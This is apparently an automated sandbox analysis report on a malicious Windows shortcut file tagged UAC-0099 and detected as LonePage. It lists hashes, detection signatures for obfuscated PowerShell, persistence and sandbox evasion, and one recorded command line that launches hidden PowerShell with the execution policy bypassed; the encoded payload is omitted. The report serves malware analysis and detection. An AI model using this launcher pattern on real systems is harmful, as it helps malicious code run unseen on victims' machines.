Windows
Analysis Report
140AEcuVy7.lnk
Overview
General Information
Sample name: | 140AEcuVy7.lnk (renamed because the original name is a hash value) |
Original sample name: | 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk |
Analysis ID: | 1522697 |
MD5: | 64752d058e5829210a0f407fb912c9d3 |
SHA1: | 4e8a0cfb784a6f93f8974b4f11679786cef86bb7 |
SHA256: | 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51 |
Tags: | lnk, UAC-0099, user-JAMESWT_MHT |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 6496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='<long base64-encoded payload omitted>')